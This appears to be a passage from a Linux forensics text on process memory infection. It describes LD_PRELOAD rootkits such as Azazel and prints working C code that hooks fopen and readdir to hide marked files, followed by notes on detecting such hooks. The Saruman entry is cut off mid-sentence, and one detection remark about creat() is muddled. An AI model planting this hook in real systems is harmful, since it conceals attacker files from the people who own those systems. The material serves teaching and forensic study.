Process memory infection

There are many rootkits, viruses, backdoors, and other tools out there that can be used to infect a system's userland memory. We will now name and describe a few of these.

Process infection tools

  • Azazel: This is a simple but effective LD_PRELOAD injection userland rootkit for Linux, based on its predecessor rootkit, Jynx. LD_PRELOAD rootkits work by having the dynamic linker load a shared object ahead of libc into every dynamically linked program started with the variable set (or from /etc/ld.so.preload), so that symbols the rootkit defines are resolved to its code before libc's. Typically, such a rootkit hijacks functions such as open, read, write, fopen, readdir, and so on, filters the results, and forwards the call to the real libc implementation. In the infected process, the hijacked functions show up as PLT hooks: the GOT entries for those symbols point into the preloaded object instead of libc. For more information, visit https://github.com/chokepoint/azazel.
  • Saruman: This is a relatively new anti-forensics infection technique that allows a user ...
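The following is an added example of the Azazel-style LD_PRELOAD hook described above; it is not Azazel's own code or code from the book. It interposes fopen and readdir (open, read and write follow the same pattern) so that any path or directory entry containing an assumed marker string, here `__hidden__`, ceases to exist from the infected process's point of view. The real libc implementations are located with `dlsym(RTLD_NEXT, ...)`, which is why the infected process's GOT entries for these symbols end up pointing at the hook object rather than at libc.

```c
/*
 * Added example (not Azazel's code): a minimal LD_PRELOAD userland hook.
 * Hidden marker HIDE_TOKEN is an assumption chosen for illustration.
 *
 * Build as a preload library:   gcc -shared -fPIC -o hook.so hook.c -ldl
 * Use against a target:         LD_PRELOAD=./hook.so ls -la /tmp
 * Compiled into an ordinary executable instead, these definitions still
 * take precedence over libc's for that program's own calls, so the hooks
 * can be exercised without a separate shared object.
 */
#define _GNU_SOURCE
#include <dirent.h>
#include <dlfcn.h>
#include <errno.h>
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>

#ifndef RTLD_NEXT
/* glibc and musl value; used only if _GNU_SOURCE was not in effect */
#define RTLD_NEXT ((void *) -1l)
#endif

#define HIDE_TOKEN "__hidden__"

typedef FILE *(*fopen_fn)(const char *, const char *);
typedef struct dirent *(*readdir_fn)(DIR *);

static fopen_fn real_fopen;
static readdir_fn real_readdir;

/* Resolve libc's implementations lazily. RTLD_NEXT skips this object and
 * returns the next definition in the link map, i.e. libc's. */
static void resolve(void)
{
    if (!real_fopen)
        real_fopen = (fopen_fn) dlsym(RTLD_NEXT, "fopen");
    if (!real_readdir)
        real_readdir = (readdir_fn) dlsym(RTLD_NEXT, "readdir");
}

/* Policy: anything whose name carries the marker is hidden. */
int should_hide(const char *name)
{
    return name != NULL && strstr(name, HIDE_TOKEN) != NULL;
}

/* Hooked fopen(): hidden paths appear not to exist; everything else is
 * forwarded to libc unchanged. */
FILE *fopen(const char *path, const char *mode)
{
    resolve();
    if (should_hide(path)) {
        errno = ENOENT;
        return NULL;
    }
    return real_fopen(path, mode);
}

/* Hooked readdir(): skip hidden entries so directory listings never show
 * them. The loop keeps pulling real entries until a visible one (or the end
 * of the directory) is reached. */
struct dirent *readdir(DIR *dirp)
{
    resolve();
    struct dirent *ent;
    while ((ent = real_readdir(dirp)) != NULL) {
        if (!should_hide(ent->d_name))
            break;
    }
    return ent;
}
```

Note that libc's own internal calls are not affected: `creat()` or `ls`'s use of `getdents64` through a different entry point still see the files, which is exactly the kind of inconsistency a forensic check exploits. Comparing a process's GOT entry for `fopen` or `readdir` against the address range of the mapped libc, or diffing a directory listing taken through the hooked process against one taken by a statically linked tool, exposes this class of hook.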
